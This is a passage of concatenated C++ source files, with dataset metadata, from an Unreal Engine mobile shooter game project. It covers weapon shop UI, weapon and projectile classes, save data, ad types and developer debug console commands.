ServiceOpen;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tstruct FPGWeaponData WeaponData;\n\n\t// UI에 표현할 무기 이미지\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Image\")\n\tstruct FSlateBrush WeaponImage;\n\n\t// 무기 발사시 사용되는 애니메이션\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Animation\")\n\tclass UAnimMontage* MontageFireReaction;\n\n\t// 무기 잠금 해제 가격\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG ShopData\")\n\tint32 CostUnlock;\n\n\t// 무기 공격력 강화 가격\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG ShopData\")\n\tint32 CostUpgradePower;\n\n\t// 무기 탄약 수 증가 가격\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG ShopData\")\n\tint32 CostUpgradeAmmo;\n};\n\n\n//=========================================================================================\n// 광고 데이터\n//=========================================================================================\nUENUM()\nenum class EADType : int32\n{\n\teAT_WeaponShop = 0,\t\t// 무기고 내 광고\n\teAT_StageClear3X,\t\t// 스테이지 클리어 후 3배 보상 광고\n\teAT_StagePlayAD,\t\t// 스테이지 플레이 광고\n\teAT_Max,\n};\n\nUSTRUCT(BlueprintType)\nstruct FPGADTableData : public FTableRowBase\n{\n\tGENERATED_BODY()\npublic:\n\tFPGADTableData() : Type(EADType::eAT_Max), ReViewableTime(0), TimeDeduction_MainLobby(false), TimeDeduction_StagePlay(false) { }\n\n\t// 광고 타입\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tEADType Type;\t\n\n\t// 재시청 제한시간\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 ReViewableTime;\n\n\t// 메인로비에서 재시청 시간을 차감한다.\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tbool TimeDeduction_MainLobby;\n\n\t// 스테이지 플레이에서 재시청 시간을 차감한다.\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tbool TimeDeduction_StagePlay;\n};" }, { "alpha_fraction": 0.5735294222831726, "alphanum_fraction": 0.5759803652763367, "avg_line_length": 24.5, "blob_id": "7e9a3b104ec9ee4fc9a60196c7bead294a2da7a3", "content_id": "9d8203abd5eb42b67c0aa35ec2e0c6c4be3e2078", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1542, "license_type": "no_license", "max_line_length": 110, "num_lines": 48, "path": "/Source/Project_Gun/Public/Game/Console/PG_Console.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", 
"src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n/**\n * \n */\nclass PROJECT_GUN_API PG_Console\n{\npublic :\n\t//****************************************************************************************\n\t// 커맨드 추가시 PG_Command를 상속받은 클래스 제작한 후\n\t// PG_Console::CreateCommands() 함수 내에 ADD_COMMAND 매크로를 이용하여\n\t// 커맨드를 추가한다.\n\t//****************************************************************************************\n\tenum ECosloeCommands : int32\n\t{\n\t\teCC_SET_TARGET_STAGE_ID = 0,\t\t// 현재 플레이하는 레벨에서 스테이지 ID값으로 변경한다. (변경 후 스테이지 클리어, 또는 다시 시작시 변경된 스테이지값으로 시작한다.)\n\t\teCC_RESTART_STAGE,\t\t\t\t\t// 현재 스테이지를 다시 시작한다.\n\t\teCC_NEXT_STAGE,\t\t\t\t\t\t// 다음 스테이지를 시작한다.\n\t\teCC_PREV_STAGE,\t\t\t\t\t\t// 이전 스테이지를 시작한다.\n\t\teCC_START_STAGE,\t\t\t\t\t// 입력된 스테이지를 시작한다.\n\t\teCC_SHOW_ME_THE_MONEY,\t\t\t\t// 입력한 값으로 Point를 설정한다.\n\t\teCC_ALL_STAGE_UNLOCK,\t\t\t\t// 모든 스테이지를 Unlock 한다.\n\t\teCC_Max,\n\t};\n\npublic:\n\tPG_Console();\n\t~PG_Console();\n\npublic :\n\tbool InitConsoleCommands();\n\tvoid ReleaseCommands();\n\n\tvoid UpdateCommands();\n\n\tclass PG_Command* GetCommand(class IConsoleVariable* pConsoleVariable);\n\nprivate :\n\tvoid CreateCommands();\n\nprivate :\n\tUPROPERTY()\n\tTArray<class PG_Command*> m_kCommands;\n};\n" }, { "alpha_fraction": 0.7633073925971985, "alphanum_fraction": 0.7654051184654236, "avg_line_length": 32.95252227783203, "blob_id": "df561b740161757e274991cba5cfc40989de1f78", "content_id": "46928c2192a0e07267f869480e265264f3b8e0d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 11507, "license_type": "no_license", "max_line_length": 217, "num_lines": 337, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetShopWeaponBox.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"UI/PG_UserWidgetShopWeaponBox.h\"\n#include \"UI/PG_UserWidgetBuyPopup.h\"\n#include \"UI/PG_UserWidgetMessagePopup.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include \"SaveData/PG_SavePlayerData.h\"\n\n#include <Components/Button.h>\n#include <Components/Image.h>\n#include <Components/TextBlock.h>\n\nvoid UPG_UserWidgetShopWeaponBox::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\tABCHECK(nullptr != Btn_Weapon);\n\tABCHECK(nullptr != Btn_Power);\n\tABCHECK(nullptr != Btn_Ammo);\n\tABCHECK(nullptr != Text_PowerLevel);\n\tABCHECK(nullptr != Text_AmmoLevel);\n\tABCHECK(nullptr != Img_WeaponLock);\n\tABCHECK(nullptr != Img_PowerUp);\n\tABCHECK(nullptr != Img_AmmoUp);\n\n\tBtn_Weapon->OnClicked.AddDynamic(this, &UPG_UserWidgetShopWeaponBox::OnRequestUnlockWeapon);\n\tBtn_Power->OnClicked.AddDynamic(this, &UPG_UserWidgetShopWeaponBox::OnRequestLevelupPower);\n\tBtn_Ammo->OnClicked.AddDynamic(this, &UPG_UserWidgetShopWeaponBox::OnRequestLevelupAmmo);\n\n\t{\n\t\tm_pUserWidgetBuyPopup = CreateWidget<UPG_UserWidgetBuyPopup>(GetWorld(), LoadClass<UPG_UserWidgetBuyPopup>(NULL, TEXT(\"WidgetBlueprint'/Game/PG/Blueprints/WidgetBP/WB_BuyPopup.WB_BuyPopup_C'\")));\n\t\tABCHECK(nullptr != m_pUserWidgetBuyPopup);\n\n\t\tm_pUserWidgetBuyPopup->OnBtnClickedOK.AddUObject(this, &UPG_UserWidgetShopWeaponBox::OnBuyOK);\n\t\tm_pUserWidgetBuyPopup->OnOnBtnClickedCancel.AddUObject(this, 
&UPG_UserWidgetShopWeaponBox::OnBuyCancel);\n\t\tm_pUserWidgetBuyPopup->SetVisibility(ESlateVisibility::Hidden);\n\t\tm_pUserWidgetBuyPopup->AddToViewport(999);\n\t}\n\n\t{\n\t\tm_pUserWidgetMessagePopup = CreateWidget<UPG_UserWidgetMessagePopup>(GetWorld(), LoadClass<UPG_UserWidgetMessagePopup>(NULL, TEXT(\"WidgetBlueprint'/Game/PG/Blueprints/WidgetBP/WB_MessagePopup.WB_MessagePopup_C'\")));\n\t\tABCHECK(nullptr != m_pUserWidgetBuyPopup);\n\n\t\tm_pUserWidgetMessagePopup->OnBtnClickedOK.AddUObject(this, &UPG_UserWidgetShopWeaponBox::OnMessagePopupBoxClose);\n\t\tm_pUserWidgetMessagePopup->SetVisibility(ESlateVisibility::Hidden);\n\t\tm_pUserWidgetMessagePopup->AddToViewport(999);\n\t}\n}\n\nvoid UPG_UserWidgetShopWeaponBox::SetWeaponIndex(class APG_GameModeBase* pGameMode, int32 nWeaponIndex)\n{\n\tABCHECK(nullptr != Btn_Weapon);\n\tABCHECK(nullptr != pGameMode);\n\n\tauto pPlayerSaveData = pGameMode->GetSavePlayerData();\n\tABCHECK(nullptr != pPlayerSaveData);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tm_pGameMode = pGameMode;\n\tWeaponIndex = nWeaponIndex;\n\n\tconst FPGWeaponTableData* pWeaponShopData = pGameInstance->GetWeaponTableData(nWeaponIndex);\n\tif (nullptr == pWeaponShopData)\n\t{\n\t\tABLOG(Error, TEXT(\"GetWeaponTableData is Null (WeaponIndex : %d)\"), nWeaponIndex);\n\t\tSetEnable(false);\n\t\treturn;\n\t}\n\n\t// 무기 판매 가능한지 검사\n\tif (false == pWeaponShopData->ServiceOpen)\n\t{\n\t\tSetEnable(false);\n\t\treturn;\n\t}\n\n\t// 무기 이미지 설정\n\tBtn_Weapon->WidgetStyle.SetNormal(pWeaponShopData->WeaponImage);\n\tBtn_Weapon->WidgetStyle.SetHovered(pWeaponShopData->WeaponImage);\n\tBtn_Weapon->WidgetStyle.SetPressed(pWeaponShopData->WeaponImage);\n\tBtn_Weapon->WidgetStyle.SetDisabled(pWeaponShopData->WeaponImage);\n\n\tIsMaxPower = pGameMode->IsMaxLevelPower(nWeaponIndex);\n\tIsMaxAmmo = pGameMode->IsMaxLevelAmmo(nWeaponIndex);\n\tIsAbleBuyWepaon = !pGameMode->IsUnlockWeapon(nWeaponIndex);\n\tIsAbleBuyPower = pGameMode->IsAbleBuyRewardPointPower(nWeaponIndex);\n\tIsAbleBuyAmmo = pGameMode->IsAbleBuyRewardPointAmmo(nWeaponIndex);\n\n\t// 무기 데이터 설정\n\tauto pWeaponOwnData = pPlayerSaveData->WeaponOwnData.Find(nWeaponIndex);\n\tif (pWeaponOwnData)\n\t{\n\t\tSetPowerLevel(pWeaponOwnData->PowerLevel);\n\t\tSetAmmoLevel(pWeaponOwnData->MagLevel);\n\t\tSetEnable(pWeaponOwnData->IsUnlock);\n\t}\n\telse\n\t{\n\t\tSetEnable(false);\n\t\treturn;\n\t}\n}\n\nvoid UPG_UserWidgetShopWeaponBox::SetSlotIndex(int32 nSlotIndex)\n{\n\tSlotIndex = nSlotIndex;\n}\n\nvoid UPG_UserWidgetShopWeaponBox::SetPowerLevel(int32 nPowerLevel)\n{\n\tPowerLevel = nPowerLevel;\n}\n\nvoid UPG_UserWidgetShopWeaponBox::SetAmmoLevel(int32 nAmmoLevel)\n{\n\tAmmoLevel = nAmmoLevel;\n}\n\nvoid UPG_UserWidgetShopWeaponBox::SetEnable(bool bEnable)\n{\n\tABCHECK(nullptr != Btn_Weapon);\n\tABCHECK(nullptr != Btn_Power);\n\tABCHECK(nullptr != Btn_Ammo);\n\tABCHECK(nullptr != Text_PowerLevel);\n\tABCHECK(nullptr != Text_AmmoLevel);\n\tABCHECK(nullptr != Img_WeaponLock);\n\tABCHECK(nullptr != Img_PowerUp);\n\tABCHECK(nullptr != Img_AmmoUp);\n\n\tif (bEnable)\n\t{\n\t\tBtn_Weapon->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tBtn_Weapon->SetIsEnabled(false);\n\t\tBtn_Power->SetVisibility(ESlateVisibility::Visible);\n\t\tBtn_Power->SetIsEnabled(!(IsMaxPower || false == IsAbleBuyPower));\n\t\tBtn_Ammo->SetVisibility(ESlateVisibility::Visible);\n\t\tBtn_Ammo->SetIsEnabled(!(IsMaxAmmo || false == IsAbleBuyAmmo));\n\n\t\tif 
(IsMaxPower)\n\t\t\tText_PowerLevel->SetText(FText::FromString(TEXT(\"MAX\")));\n\t\telse\n\t\t\tText_PowerLevel->SetText(FText::FromString(*FString::Printf(TEXT(\"LV %d\"), PowerLevel)));\n\n\t\tif (IsMaxAmmo)\n\t\t\tText_AmmoLevel->SetText(FText::FromString(TEXT(\"MAX\")));\n\t\telse\n\t\t\tText_AmmoLevel->SetText(FText::FromString(*FString::Printf(TEXT(\"LV %d\"), AmmoLevel)));\n\n\t\tImg_WeaponLock->SetVisibility(ESlateVisibility::Hidden);\n\n\t\tif (IsMaxPower || false == IsAbleBuyPower)\n\t\t\tImg_PowerUp->SetVisibility(ESlateVisibility::Hidden);\n\t\telse\n\t\t\tImg_PowerUp->SetVisibility(ESlateVisibility::SelfHitTestInvisible);\n\n\t\tif (IsMaxAmmo || false == IsAbleBuyAmmo)\n\t\t\tImg_AmmoUp->SetVisibility(ESlateVisibility::Hidden);\n\t\telse\n\t\t\tImg_AmmoUp->SetVisibility(ESlateVisibility::SelfHitTestInvisible);\n\t}\n\telse\n\t{\n\t\tBtn_Weapon->SetVisibility(ESlateVisibility::Visible);\n\t\tBtn_Weapon->SetIsEnabled(IsAbleBuyWepaon);\n\t\tBtn_Power->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tBtn_Ammo->SetVisibility(ESlateVisibility::HitTestInvisible);\n\n\t\tImg_WeaponLock->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tImg_PowerUp->SetVisibility(ESlateVisibility::Hidden);\n\t\tImg_AmmoUp->SetVisibility(ESlateVisibility::Hidden);\n\n\t\tText_PowerLevel->SetText(FText::FromString(TEXT(\"LV --\")));\n\t\tText_AmmoLevel->SetText(FText::FromString(TEXT(\"LV --\")));\n\t}\n}\n\nvoid UPG_UserWidgetShopWeaponBox::UpdateWeaponShopLayout()\n{\n\tABCHECK(PG_INVALID_INDEX != WeaponIndex);\n\tABCHECK(nullptr != m_pGameMode);\n\n\tSetWeaponIndex(m_pGameMode.Get(), WeaponIndex);\n}\n\nvoid UPG_UserWidgetShopWeaponBox::ShowBuyPopupBox(EBuyType ekBuyType, FString kTitle, FString kDescription, int32 nPrice)\n{\n\tABCHECK(nullptr != m_pUserWidgetBuyPopup);\n\tm_pUserWidgetBuyPopup->SetValue((int32)ekBuyType);\n\tm_pUserWidgetBuyPopup->SetTitle(kTitle);\n\tm_pUserWidgetBuyPopup->SetPrice(nPrice);\n\tm_pUserWidgetBuyPopup->SetDescription(kDescription);\n\tm_pUserWidgetBuyPopup->SetVisibility(ESlateVisibility::Visible);\n}\n\nvoid UPG_UserWidgetShopWeaponBox::ShowMessageBox(FString kTitle, FString kDescription, int32 nValue)\n{\n\tABCHECK(nullptr != m_pUserWidgetMessagePopup);\n\tm_pUserWidgetMessagePopup->SetValue(nValue);\n\tm_pUserWidgetMessagePopup->SetTitle(kTitle);\n\tm_pUserWidgetMessagePopup->SetDescription(kDescription);\n\tm_pUserWidgetMessagePopup->SetVisibility(ESlateVisibility::Visible);\n}\n\nvoid UPG_UserWidgetShopWeaponBox::OnBuyOK(int32 nValue)\n{\n\tABCHECK(nullptr != m_pUserWidgetBuyPopup);\n\tm_pUserWidgetBuyPopup->SetVisibility(ESlateVisibility::Hidden);\n\n\tif (false == m_pGameMode.IsValid(true))\n\t{\n\t\tABLOG(Error, TEXT(\"m_pGameMode is nullptr\"));\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\t\n\tauto pMyPlayerState =Cast<APG_MyPlayerState>(GetOwningPlayerState());\n\tABCHECK(nullptr != pMyPlayerState);\n\n\t// 구매 진행\n\tbool bBuySuccesed = false;\n\tswitch ((EBuyType)nValue)\n\t{\n\tcase EBuyType::eBT_Weapon:\t\tbBuySuccesed = m_pGameMode->BuyWeapon(WeaponIndex);\t\tbreak;\n\tcase EBuyType::eBT_Power:\t\tbBuySuccesed = m_pGameMode->BuyPowerUp(WeaponIndex);\tbreak;\n\tcase EBuyType::eBT_Ammo:\t\tbBuySuccesed = m_pGameMode->BuyAmmoUp(WeaponIndex);\t\tbreak;\n\tdefault:\t\tbreak;\n\t}\n\n\t// 구매 실패\n\tif (false == bBuySuccesed)\n\t{\n\t\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\t\tABCHECK(nullptr != pGameInstance);\n\n\t\tconst FPGWeaponTableData* 
pWeaponShopData = pGameInstance->GetWeaponTableData(WeaponIndex);\n\t\tif (nullptr == pWeaponShopData)\n\t\t{\n\t\t\tABLOG(Error, TEXT(\"GetWeaponTableData is Null (WeaponIndex : %d)\"), WeaponIndex);\n\t\t\tSetEnable(false);\n\t\t\treturn;\n\t\t}\n\n\t\tShowMessageBox(pWeaponShopData->WeaponData.Name, m_pGameMode->GetLastBuyErrorMsg(), nValue);\n\t}\n\n\tOnItemBuyWeapon.Broadcast();\n}\n\nvoid UPG_UserWidgetShopWeaponBox::OnBuyCancel(int32 nValue)\n{\n\tABCHECK(nullptr != m_pUserWidgetBuyPopup);\n\tm_pUserWidgetBuyPopup->SetVisibility(ESlateVisibility::Hidden);\n}\n\nvoid UPG_UserWidgetShopWeaponBox::OnMessagePopupBoxClose()\n{\n\tABCHECK(nullptr != m_pUserWidgetMessagePopup);\n\tm_pUserWidgetMessagePopup->SetVisibility(ESlateVisibility::Hidden);\n}\n\nvoid UPG_UserWidgetShopWeaponBox::OnRequestUnlockWeapon()\n{\n\tif (false == m_pGameMode.IsValid(true))\n\t{\n\t\tABLOG(Error, TEXT(\"m_pGameMode is nullptr\"));\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tconst FPGWeaponTableData* pWeaponShopData = pGameInstance->GetWeaponTableData(WeaponIndex);\n\tif (nullptr == pWeaponShopData)\n\t{\n\t\tABLOG(Error, TEXT(\"GetWeaponTableData is Null (WeaponIndex : %d)\"), WeaponIndex);\n\t\tSetEnable(false);\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\t\n\tShowBuyPopupBox(EBuyType::eBT_Weapon, pWeaponShopData->WeaponData.Name, TEXT(\"Do you want to buy?\"), pWeaponShopData->CostUnlock);\n}\n\nvoid UPG_UserWidgetShopWeaponBox::OnRequestLevelupPower()\n{\n\tif (false == m_pGameMode.IsValid(true))\n\t{\n\t\tABLOG(Error, TEXT(\"m_pGameMode is nullptr\"));\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tconst FPGWeaponTableData* pWeaponShopData = pGameInstance->GetWeaponTableData(WeaponIndex);\n\tif (nullptr == pWeaponShopData)\n\t{\n\t\tABLOG(Error, TEXT(\"GetWeaponTableData is Null (WeaponIndex : %d)\"), WeaponIndex);\n\t\tSetEnable(false);\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\n\tShowBuyPopupBox(EBuyType::eBT_Power, FString::Printf(TEXT(\"%s Power\"), *pWeaponShopData->WeaponData.Name), TEXT(\"Do you want to buy?\"), pWeaponShopData->CostUpgradePower);\n}\n\nvoid UPG_UserWidgetShopWeaponBox::OnRequestLevelupAmmo()\n{\n\tABCHECK(nullptr != m_pUserWidgetBuyPopup);\n\n\tif (false == m_pGameMode.IsValid(true))\n\t{\n\t\tABLOG(Error, TEXT(\"m_pGameMode is nullptr\"));\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tconst FPGWeaponTableData* pWeaponShopData = pGameInstance->GetWeaponTableData(WeaponIndex);\n\tif (nullptr == pWeaponShopData)\n\t{\n\t\tABLOG(Error, TEXT(\"GetWeaponTableData is Null (WeaponIndex : %d)\"), WeaponIndex);\n\t\tSetEnable(false);\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\n\tShowBuyPopupBox(EBuyType::eBT_Ammo, FString::Printf(TEXT(\"%s Ammo\"), *pWeaponShopData->WeaponData.Name), TEXT(\"Do you want to buy?\"), pWeaponShopData->CostUpgradeAmmo);\n}" }, { "alpha_fraction": 
0.7454931139945984, "alphanum_fraction": 0.7529162168502808, "avg_line_length": 21.452381134033203, "blob_id": "e0b478d627b7f183b27656e070b021181bb8ebf1", "content_id": "e0f1b67a6089c025d7c45ed14f5c65e6f5d43878", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 967, "license_type": "no_license", "max_line_length": 79, "num_lines": 42, "path": "/Source/Project_Gun/Public/SaveData/PG_SaveStageData.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <GameFramework/SaveGame.h>\n#include \"PG_SaveStageData.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_SaveStageData : public USaveGame\n{\n\tGENERATED_BODY()\n\t\npublic :\n\tUPG_SaveStageData();\n\n\tUPROPERTY(VisibleAnyWhere, Category = \"PG StageSaveData\")\n\tint32 m_nStageID = 0;\n\n\t// 목표로 설정된 몬스터 제거\n\tUPROPERTY(VisibleAnyWhere, Category = \"PG StageSaveData\")\n\tstruct FPGStagePlayData m_kStagePlayData;\n\n\tUPROPERTY(VisibleAnyWhere, Category = \"PG StageSaveData\")\n\tbool m_bWasClearAmount = false;\n\n\tUPROPERTY(VisibleAnyWhere, Category = \"PG StageSaveData\")\n\tbool m_bWasClearTime = false;\n\n\tUPROPERTY(VisibleAnyWhere, Category = \"PG StageSaveData\")\n\tbool m_bWasClearLethal = false;\n\npublic :\n\tUFUNCTION()\n\tstatic FString GetSlotName(int32 a_nStageID);\n\tUFUNCTION()\n\tstatic int32 GetPlayerIndex();\n};\n" }, { "alpha_fraction": 0.7579666376113892, "alphanum_fraction": 0.7606221437454224, "avg_line_length": 22.33628273010254, "blob_id": "0a29e6c4141416ce3b16c7519546038e7eba8cce", "content_id": "5db5596739e525ad8e751a21b13cad43e93d6a94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2654, "license_type": "no_license", "max_line_length": 115, "num_lines": 113, "path": "/Source/Project_Gun/Private/BlueScriptObject/Weapon/PG_Weapon.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n#include \"BlueScriptObject/Projectile/PG_Projectile.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"Character/PG_MyChar.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n\n// Sets default values\nAPG_Weapon::APG_Weapon()\n{\n \t// Set this actor to call Tick() every frame. 
You can turn this off to improve performance if you don't need it.\n\tPrimaryActorTick.bCanEverTick = false;\n\n\t// 캐릭터에 무기 부착\n\tWeapon = CreateDefaultSubobject<UStaticMeshComponent>(TEXT(\"WEAPON\"));\n\tFiringEffect = CreateDefaultSubobject<UParticleSystemComponent>(TEXT(\"FIRINGEFFECT\"));\n\tFiringEffect->bAutoActivate = false;\n\tFireSound = CreateDefaultSubobject<UAudioComponent>(TEXT(\"FIRESOUND\"));\n\tFireSound->bAutoActivate = false;\n\n\tRootComponent = Weapon;\n\tWeaponTableIndex = PG_INVALID_INDEX;\n}\n\n// Called when the game starts or when spawned\nvoid APG_Weapon::BeginPlay()\n{\n\tSuper::BeginPlay();\n}\n\nvoid APG_Weapon::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n}\n\nvoid APG_Weapon::OnConstruction(const FTransform& Transform)\n{\n\tSuper::OnConstruction(Transform);\n}\n\nvoid APG_Weapon::Destroyed()\n{\n\tSuper::Destroyed();\n}\n\n// Called every frame\nvoid APG_Weapon::Tick(float DeltaTime)\n{\n\tSuper::Tick(DeltaTime);\n}\nbool APG_Weapon::SetWeaponData(int32 nWeaponTableIndex)\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tauto pWeaponTableData = pGameInstance->GetWeaponTableData(nWeaponTableIndex);\n\tABCHECK(nullptr != pWeaponTableData, false);\n\n\tWeaponTableIndex = nWeaponTableIndex;\n\tWeaponData = pWeaponTableData->WeaponData;\n\tMontageFireReaction = pWeaponTableData->MontageFireReaction;\n\n\treturn true;\n}\n\nint32 APG_Weapon::GetAttackRange()\n{\n\treturn WeaponData.AttackRange;\n}\n\nUAnimMontage* APG_Weapon::GetMontageFireReaction()\n{\n\treturn MontageFireReaction;\n}\n\n//void APG_Weapon::SetWeaponData(const FPGWeaponData* pWeaponData)\n//{\n//\tWeaponData = *pWeaponData;\n//}\n\nconst FPGWeaponData* APG_Weapon::GetWeaponData()\n{\n\treturn &WeaponData;\n}\n\nint32 APG_Weapon::GetWeaponAttackDamage()\n{\n\tauto pGameInstance = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameInstance, 0);\n\n\treturn pGameInstance->GetMaxPower(WeaponTableIndex);\n}\n\nbool APG_Weapon::IsOwnerMonster()\n{\n\treturn (nullptr != Cast<APG_MonChar>(GetOwner()));\n}\n\nbool APG_Weapon::IsOwnerMyPlayer()\n{\n\treturn (nullptr != Cast<APG_MyChar>(GetOwner()));\n}\n\nvoid APG_Weapon::Fire()\n{\n}\n\nvoid APG_Weapon::StopFire()\n{\n\n}" }, { "alpha_fraction": 0.7950760126113892, "alphanum_fraction": 0.7979725003242493, "avg_line_length": 31.11627960205078, "blob_id": "e3a514680da9528791ec27382735deddb6c49e9b", "content_id": "f8f164b7288335f04ec0f11e5c9a0f7aea5fefca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1407, "license_type": "no_license", "max_line_length": 202, "num_lines": 43, "path": "/Source/Project_Gun/Public/BlueScriptObject/Projectile/PG_ProjectileShutgun.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"BlueScriptObject/Projectile/PG_Projectile.h\"\n\n#include \"PG_ProjectileShutgun.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_ProjectileShutgun : public APG_Projectile\n{\n\tGENERATED_BODY()\n\npublic:\n\tAPG_ProjectileShutgun();\n\nprotected:\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void BeginPlay() override;\t// Called when the game starts or when spawned\n\tvirtual void Tick(float DeltaTime) override;\t// Called every 
frame\n\t\npublic:\n\tvirtual void FireInDirection(const struct FPGWeaponData* pWeaponData, const FVector& ShootDirection, bool bMonsterWeapon = false) override;\n\n\tvoid SetScaleTime(float fScaleTime);\n\nprivate:\n\tvoid UpdateCollisionScale(float DeltaTime);\n\nprotected:\n\tvirtual void OnTargetBeginOverlap(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromWeep, const FHitResult& SweepResult) override;\n\tvirtual void OnPlayEndParticle(UParticleSystemComponent* ParticleSystemComponent) override;\n\nprivate:\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG ProjectileData\", Meta = (AllowPrivateAccess = true))\n\tUStaticMeshComponent*\tCollisionMeshComponent;\t// 샷건 발사시 충돌 체크를 위한 Static Mesh\n\n\tfloat m_fScaleTime = 0.0f;\n};\n" }, { "alpha_fraction": 0.7605177760124207, "alphanum_fraction": 0.7631068229675293, "avg_line_length": 23.15625, "blob_id": "686b4131a6d4631d45d2c96d7b3cab36ad670099", "content_id": "92e476559141997f45b9b21f6f1d8cabbcbdeafd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1547, "license_type": "no_license", "max_line_length": 79, "num_lines": 64, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetBuyPopup.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"UI/PG_UserWidgetBuyPopup.h\"\n\n#include <Components/Button.h>\n#include <Components/TextBlock.h>\n\nvoid UPG_UserWidgetBuyPopup::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\tABCHECK(nullptr != Text_TitleName);\n\tABCHECK(nullptr != Text_Description);\n\tABCHECK(nullptr != Text_Price);\n\tABCHECK(nullptr != Btn_OK);\n\tABCHECK(nullptr != Btn_Cancel);\n\n\tBtn_OK->OnClicked.AddDynamic(this, &UPG_UserWidgetBuyPopup::OnBtnOK);\n\tBtn_Cancel->OnClicked.AddDynamic(this, &UPG_UserWidgetBuyPopup::OnBtnCancel);\n}\n\nvoid UPG_UserWidgetBuyPopup::SetVisibility(ESlateVisibility InVisibility)\n{\n\tSuper::SetVisibility(InVisibility);\n\n\tif (ESlateVisibility::Hidden != InVisibility)\n\t{\n\t\tif (PopupPlaySound)\n\t\t\tPlaySound(PopupPlaySound);\n\t}\n}\n\nvoid UPG_UserWidgetBuyPopup::SetTitle(FString kTitle)\n{\n\tABCHECK(nullptr != 